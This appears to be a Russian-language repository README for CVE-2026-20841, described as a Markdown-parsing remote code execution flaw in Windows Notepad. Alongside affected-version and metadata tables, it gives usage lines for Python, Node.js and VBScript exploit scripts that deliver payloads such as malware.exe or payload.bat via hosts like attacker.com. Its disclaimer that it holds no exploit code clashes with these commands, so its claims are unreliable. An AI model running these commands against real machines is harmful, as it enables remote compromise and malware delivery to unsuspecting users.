
CVE-2026-20841
Репозиторий для исследований в области безопасности и технического анализа
⚠️ Этот репозиторий предназначен только для образовательных, защитных и исследовательских целей.
CVE-2026-20841 — это критическая уязвимость удаленного выполнения кода (RCE), затрагивающая функциональность обработки Markdown в Windows Notepad.
Злоумышленник может вызвать произвольное выполнение кода при открытии специально созданного файла в уязвимой версии Windows Notepad.
| Продукт | Статус |
|---|---|
| Notepad в Windows 11 | Уязвим |
| Notepad в Windows 10 | Уязвим |
| Обновленные/исправленные версии | Не уязвимы |
python CVE-2026-20841.py 192.168.1.100 80 malware.exe
Версия для Node.js
node CVE-2026-20841.js <host> <port> <payload-filename>
Пример:
node CVE-2026-20841.js attacker.com 445 payload.bat
Версия для VBScript (встроенный Windows)
cscript //nologo CVE-2026-20841.vbs <host> <port> <payload-filename>
Пример:
cscript //nologo CVE-2026-20841.vbs 192.168.1.45 80 update.exe
Уязвимость существует в функциональности обработки содержимого Markdown в Windows Notepad.
Открытие специально созданного файла может вызвать небезопасные операции с памятью, что может привести к произвольному выполнению кода в контексте текущего пользователя.
Злоумышленник
│
▼
Созданный Markdown-файл
│
▼
Жертва открывает файл
│
▼
Уязвимый парсер Markdown
│
▼
Повреждение памяти
│
▼
Выполнение кода
ОС : Windows 11
Приложение : Notepad
Архитектура : x64
Отладчик : WinDbg
Анализ : Статический + Динамический
Этот репозиторий не содержит готового эксплойт-кода.
Предоставленная информация предназначена исключительно для:
Пользователи несут ответственность за соблюдение всех применимых законов и нормативных актов.
Исследования в области кибербезопасности • Анализ уязвимостей • Защитная безопасность
| Поле | Значение |
|---|
| CVE | CVE-2026-20841 |
| Тип | Удаленное выполнение кода |
| Вектор атаки | Специально созданный файл |
| Взаимодействие с пользователем | Требуется |
| Требуемые привилегии | Нет |
| Серьезность | Критическая |
| Поставщик | Microsoft |